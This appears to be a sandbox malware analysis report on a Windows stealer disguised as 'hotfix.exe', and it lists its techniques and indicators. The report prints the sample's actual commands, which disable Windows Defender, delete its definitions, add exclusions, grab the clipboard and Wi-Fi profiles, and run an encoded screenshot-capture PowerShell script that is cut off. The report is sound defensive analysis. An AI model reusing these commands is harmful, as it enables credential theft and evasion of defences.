f5627b2e36bff1bf291a4bee7481dbf96b9f43c709e7d95ad42c58af36860b6e

Analysis

max time kernel
104s
max time network
129s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04-01-2025 13:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hotfix.exe
Size

7.4MB
MD5

a2271e54b0c19f1efdba770dccee0128
SHA1

6b3ff7d411df91cfc0f4a356eae6c1f407b2b8dd
SHA256

f5627b2e36bff1bf291a4bee7481dbf96b9f43c709e7d95ad42c58af36860b6e
SHA512

04840f8cabbadd75ebea0ae0e948551985f335c552cfdc78c8c81e8ecab690df76641414e53b4c05702e067cbf21985fddc04b4e63ec858c887bc8ccd52891ff
SSDEEP

196608:MITurErvI9pWjgyvoaYrE41JIuIwoOdhe:hTurEUWjdo/H1JzoChe

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3584	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
116	powershell.exe
4576	powershell.exe
1184	powershell.exe
5364	powershell.exe
5204	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	hotfix.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5608	cmd.exe
6008	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2784	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe
1428	hotfix.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2892	tasklist.exe
2880	tasklist.exe
1176	tasklist.exe
3564	tasklist.exe
1036	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00240000000450fb-21.dat	upx
behavioral1/memory/1428-24-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp	upx
behavioral1/files/0x00280000000450da-27.dat	upx
behavioral1/files/0x00280000000450ec-29.dat	upx
behavioral1/files/0x00280000000450e1-47.dat	upx
behavioral1/memory/1428-48-0x00007FFBE5BA0000-0x00007FFBE5BAF000-memory.dmp	upx
behavioral1/files/0x00280000000450e0-46.dat	upx
behavioral1/files/0x00280000000450df-45.dat	upx
behavioral1/files/0x00280000000450de-44.dat	upx
behavioral1/files/0x00280000000450dd-43.dat	upx
behavioral1/files/0x00280000000450dc-42.dat	upx
behavioral1/files/0x00280000000450db-41.dat	upx
behavioral1/files/0x00280000000450d9-40.dat	upx
behavioral1/files/0x0028000000045109-39.dat	upx
behavioral1/files/0x002e000000045107-38.dat	upx
behavioral1/files/0x0028000000045103-37.dat	upx
behavioral1/files/0x00310000000450f9-34.dat	upx
behavioral1/files/0x00280000000450e4-33.dat	upx
behavioral1/memory/1428-30-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp	upx
behavioral1/memory/1428-54-0x00007FFBDBCE0000-0x00007FFBDBD0D000-memory.dmp	upx
behavioral1/memory/1428-56-0x00007FFBE2420000-0x00007FFBE2439000-memory.dmp	upx
behavioral1/memory/1428-58-0x00007FFBDBCB0000-0x00007FFBDBCD3000-memory.dmp	upx
behavioral1/memory/1428-60-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp	upx
behavioral1/memory/1428-62-0x00007FFBE07A0000-0x00007FFBE07B9000-memory.dmp	upx
behavioral1/memory/1428-64-0x00007FFBE4CF0000-0x00007FFBE4CFD000-memory.dmp	upx
behavioral1/memory/1428-66-0x00007FFBDBC70000-0x00007FFBDBCA3000-memory.dmp	upx
behavioral1/memory/1428-68-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp	upx
behavioral1/memory/1428-69-0x00007FFBDB690000-0x00007FFBDB75D000-memory.dmp	upx
behavioral1/memory/1428-73-0x00007FFBCCB20000-0x00007FFBCD049000-memory.dmp	upx
behavioral1/memory/1428-72-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp	upx
behavioral1/memory/1428-77-0x00007FFBDC050000-0x00007FFBDC064000-memory.dmp	upx
behavioral1/memory/1428-76-0x00007FFBDBCE0000-0x00007FFBDBD0D000-memory.dmp	upx
behavioral1/memory/1428-79-0x00007FFBE0610000-0x00007FFBE061D000-memory.dmp	upx
behavioral1/memory/1428-82-0x00007FFBDB3C0000-0x00007FFBDB4DC000-memory.dmp	upx
behavioral1/memory/1428-81-0x00007FFBDBCB0000-0x00007FFBDBCD3000-memory.dmp	upx
behavioral1/memory/1428-103-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp	upx
behavioral1/memory/1428-123-0x00007FFBE07A0000-0x00007FFBE07B9000-memory.dmp	upx
behavioral1/memory/1428-272-0x00007FFBDBC70000-0x00007FFBDBCA3000-memory.dmp	upx
behavioral1/memory/1428-285-0x00007FFBDB690000-0x00007FFBDB75D000-memory.dmp	upx
behavioral1/memory/1428-300-0x00007FFBCCB20000-0x00007FFBCD049000-memory.dmp	upx
behavioral1/memory/1428-310-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp	upx
behavioral1/memory/1428-304-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp	upx
behavioral1/memory/1428-305-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp	upx
behavioral1/memory/1428-339-0x00007FFBCD050000-0x00007FFBCD640000-memory.dmp	upx
behavioral1/memory/1428-367-0x00007FFBDB3C0000-0x00007FFBDB4DC000-memory.dmp	upx
behavioral1/memory/1428-366-0x00007FFBE0610000-0x00007FFBE061D000-memory.dmp	upx
behavioral1/memory/1428-365-0x00007FFBDC050000-0x00007FFBDC064000-memory.dmp	upx
behavioral1/memory/1428-364-0x00007FFBCCB20000-0x00007FFBCD049000-memory.dmp	upx
behavioral1/memory/1428-363-0x00007FFBDB690000-0x00007FFBDB75D000-memory.dmp	upx
behavioral1/memory/1428-362-0x00007FFBDBC70000-0x00007FFBDBCA3000-memory.dmp	upx
behavioral1/memory/1428-361-0x00007FFBE4CF0000-0x00007FFBE4CFD000-memory.dmp	upx
behavioral1/memory/1428-360-0x00007FFBE07A0000-0x00007FFBE07B9000-memory.dmp	upx
behavioral1/memory/1428-359-0x00007FFBDB760000-0x00007FFBDB8D6000-memory.dmp	upx
behavioral1/memory/1428-358-0x00007FFBDBCB0000-0x00007FFBDBCD3000-memory.dmp	upx
behavioral1/memory/1428-357-0x00007FFBE2420000-0x00007FFBE2439000-memory.dmp	upx
behavioral1/memory/1428-356-0x00007FFBDBCE0000-0x00007FFBDBD0D000-memory.dmp	upx
behavioral1/memory/1428-355-0x00007FFBE5BA0000-0x00007FFBE5BAF000-memory.dmp	upx
behavioral1/memory/1428-354-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2700	cmd.exe
3728	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1336	WMIC.exe
672	WMIC.exe
520	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3892	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
632	WMIC.exe
632	WMIC.exe
632	WMIC.exe
632	WMIC.exe
1184	powershell.exe
116	powershell.exe
1184	powershell.exe
116	powershell.exe
1336	WMIC.exe
1336	WMIC.exe
1336	WMIC.exe
1336	WMIC.exe
672	WMIC.exe
672	WMIC.exe
672	WMIC.exe
672	WMIC.exe
4576	powershell.exe
4576	powershell.exe
5600	WMIC.exe
5600	WMIC.exe
5600	WMIC.exe
5600	WMIC.exe
6008	powershell.exe
6008	powershell.exe
1680	powershell.exe
1680	powershell.exe
6008	powershell.exe
1680	powershell.exe
5364	powershell.exe
5364	powershell.exe
2176	powershell.exe
2176	powershell.exe
1188	WMIC.exe
1188	WMIC.exe
1188	WMIC.exe
1188	WMIC.exe
2500	WMIC.exe
2500	WMIC.exe
2500	WMIC.exe
2500	WMIC.exe
4948	WMIC.exe
4948	WMIC.exe
4948	WMIC.exe
4948	WMIC.exe
5204	powershell.exe
5204	powershell.exe
520	WMIC.exe
520	WMIC.exe
520	WMIC.exe
520	WMIC.exe
472	powershell.exe
472	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2892	tasklist.exe
Token: SeIncreaseQuotaPrivilege	632	WMIC.exe
Token: SeSecurityPrivilege	632	WMIC.exe
Token: SeTakeOwnershipPrivilege	632	WMIC.exe
Token: SeLoadDriverPrivilege	632	WMIC.exe
Token: SeSystemProfilePrivilege	632	WMIC.exe
Token: SeSystemtimePrivilege	632	WMIC.exe
Token: SeProfSingleProcessPrivilege	632	WMIC.exe
Token: SeIncBasePriorityPrivilege	632	WMIC.exe
Token: SeCreatePagefilePrivilege	632	WMIC.exe
Token: SeBackupPrivilege	632	WMIC.exe
Token: SeRestorePrivilege	632	WMIC.exe
Token: SeShutdownPrivilege	632	WMIC.exe
Token: SeDebugPrivilege	632	WMIC.exe
Token: SeSystemEnvironmentPrivilege	632	WMIC.exe
Token: SeRemoteShutdownPrivilege	632	WMIC.exe
Token: SeUndockPrivilege	632	WMIC.exe
Token: SeManageVolumePrivilege	632	WMIC.exe
Token: 33	632	WMIC.exe
Token: 34	632	WMIC.exe
Token: 35	632	WMIC.exe
Token: 36	632	WMIC.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	116	powershell.exe
Token: SeIncreaseQuotaPrivilege	632	WMIC.exe
Token: SeSecurityPrivilege	632	WMIC.exe
Token: SeTakeOwnershipPrivilege	632	WMIC.exe
Token: SeLoadDriverPrivilege	632	WMIC.exe
Token: SeSystemProfilePrivilege	632	WMIC.exe
Token: SeSystemtimePrivilege	632	WMIC.exe
Token: SeProfSingleProcessPrivilege	632	WMIC.exe
Token: SeIncBasePriorityPrivilege	632	WMIC.exe
Token: SeCreatePagefilePrivilege	632	WMIC.exe
Token: SeBackupPrivilege	632	WMIC.exe
Token: SeRestorePrivilege	632	WMIC.exe
Token: SeShutdownPrivilege	632	WMIC.exe
Token: SeDebugPrivilege	632	WMIC.exe
Token: SeSystemEnvironmentPrivilege	632	WMIC.exe
Token: SeRemoteShutdownPrivilege	632	WMIC.exe
Token: SeUndockPrivilege	632	WMIC.exe
Token: SeManageVolumePrivilege	632	WMIC.exe
Token: 33	632	WMIC.exe
Token: 34	632	WMIC.exe
Token: 35	632	WMIC.exe
Token: 36	632	WMIC.exe
Token: SeIncreaseQuotaPrivilege	116	powershell.exe
Token: SeSecurityPrivilege	116	powershell.exe
Token: SeTakeOwnershipPrivilege	116	powershell.exe
Token: SeLoadDriverPrivilege	116	powershell.exe
Token: SeSystemProfilePrivilege	116	powershell.exe
Token: SeSystemtimePrivilege	116	powershell.exe
Token: SeProfSingleProcessPrivilege	116	powershell.exe
Token: SeIncBasePriorityPrivilege	116	powershell.exe
Token: SeCreatePagefilePrivilege	116	powershell.exe
Token: SeBackupPrivilege	116	powershell.exe
Token: SeRestorePrivilege	116	powershell.exe
Token: SeShutdownPrivilege	116	powershell.exe
Token: SeDebugPrivilege	116	powershell.exe
Token: SeSystemEnvironmentPrivilege	116	powershell.exe
Token: SeRemoteShutdownPrivilege	116	powershell.exe
Token: SeUndockPrivilege	116	powershell.exe
Token: SeManageVolumePrivilege	116	powershell.exe
Token: 33	116	powershell.exe
Token: 34	116	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 1428	2300	hotfix.exe	81
PID 2300 wrote to memory of 1428	2300	hotfix.exe	81
PID 1428 wrote to memory of 1144	1428	hotfix.exe	82
PID 1428 wrote to memory of 1144	1428	hotfix.exe	82
PID 1428 wrote to memory of 3604	1428	hotfix.exe	83
PID 1428 wrote to memory of 3604	1428	hotfix.exe	83
PID 1428 wrote to memory of 5920	1428	hotfix.exe	84
PID 1428 wrote to memory of 5920	1428	hotfix.exe	84
PID 1428 wrote to memory of 4292	1428	hotfix.exe	87
PID 1428 wrote to memory of 4292	1428	hotfix.exe	87
PID 1428 wrote to memory of 828	1428	hotfix.exe	90
PID 1428 wrote to memory of 828	1428	hotfix.exe	90
PID 4292 wrote to memory of 2892	4292	cmd.exe	92
PID 4292 wrote to memory of 2892	4292	cmd.exe	92
PID 3604 wrote to memory of 1184	3604	cmd.exe	93
PID 3604 wrote to memory of 1184	3604	cmd.exe	93
PID 5920 wrote to memory of 5156	5920	cmd.exe	94
PID 5920 wrote to memory of 5156	5920	cmd.exe	94
PID 1144 wrote to memory of 116	1144	cmd.exe	95
PID 1144 wrote to memory of 116	1144	cmd.exe	95
PID 828 wrote to memory of 632	828	cmd.exe	96
PID 828 wrote to memory of 632	828	cmd.exe	96
PID 1428 wrote to memory of 6132	1428	hotfix.exe	99
PID 1428 wrote to memory of 6132	1428	hotfix.exe	99
PID 6132 wrote to memory of 5988	6132	cmd.exe	101
PID 6132 wrote to memory of 5988	6132	cmd.exe	101
PID 1428 wrote to memory of 6064	1428	hotfix.exe	102
PID 1428 wrote to memory of 6064	1428	hotfix.exe	102
PID 6064 wrote to memory of 6028	6064	cmd.exe	104
PID 6064 wrote to memory of 6028	6064	cmd.exe	104
PID 1428 wrote to memory of 5212	1428	hotfix.exe	105
PID 1428 wrote to memory of 5212	1428	hotfix.exe	105
PID 5212 wrote to memory of 1336	5212	cmd.exe	107
PID 5212 wrote to memory of 1336	5212	cmd.exe	107
PID 1428 wrote to memory of 2628	1428	hotfix.exe	108
PID 1428 wrote to memory of 2628	1428	hotfix.exe	108
PID 2628 wrote to memory of 672	2628	cmd.exe	110
PID 2628 wrote to memory of 672	2628	cmd.exe	110
PID 3604 wrote to memory of 3584	3604	cmd.exe	111
PID 3604 wrote to memory of 3584	3604	cmd.exe	111
PID 1428 wrote to memory of 904	1428	hotfix.exe	112
PID 1428 wrote to memory of 904	1428	hotfix.exe	112
PID 904 wrote to memory of 4576	904	cmd.exe	114
PID 904 wrote to memory of 4576	904	cmd.exe	114
PID 1428 wrote to memory of 1632	1428	hotfix.exe	115
PID 1428 wrote to memory of 1632	1428	hotfix.exe	115
PID 1428 wrote to memory of 3868	1428	hotfix.exe	116
PID 1428 wrote to memory of 3868	1428	hotfix.exe	116
PID 1632 wrote to memory of 2880	1632	cmd.exe	119
PID 1632 wrote to memory of 2880	1632	cmd.exe	119
PID 3868 wrote to memory of 1176	3868	cmd.exe	120
PID 3868 wrote to memory of 1176	3868	cmd.exe	120
PID 1428 wrote to memory of 1904	1428	hotfix.exe	122
PID 1428 wrote to memory of 1904	1428	hotfix.exe	122
PID 1428 wrote to memory of 5608	1428	hotfix.exe	121
PID 1428 wrote to memory of 5608	1428	hotfix.exe	121
PID 1428 wrote to memory of 1972	1428	hotfix.exe	125
PID 1428 wrote to memory of 1972	1428	hotfix.exe	125
PID 1428 wrote to memory of 4968	1428	hotfix.exe	127
PID 1428 wrote to memory of 4968	1428	hotfix.exe	127
PID 1428 wrote to memory of 2700	1428	hotfix.exe	128
PID 1428 wrote to memory of 2700	1428	hotfix.exe	128
PID 5608 wrote to memory of 6008	5608	cmd.exe	130
PID 5608 wrote to memory of 6008	5608	cmd.exe	130

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5204	attrib.exe
2748	attrib.exe

C:\Users\Admin\AppData\Local\Temp\hotfix.exe
"C:\Users\Admin\AppData\Local\Temp\hotfix.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Users\Admin\AppData\Local\Temp\hotfix.exe
  "C:\Users\Admin\AppData\Local\Temp\hotfix.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hotfix.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hotfix.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1184
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Open your game first', 0, 'error', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5920
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Open your game first', 0, 'error', 48+16);close()"
      4⤵
      PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4292
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6132
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6064
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:6008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1904
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1972
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4968
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2700
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:6012
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5252
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAA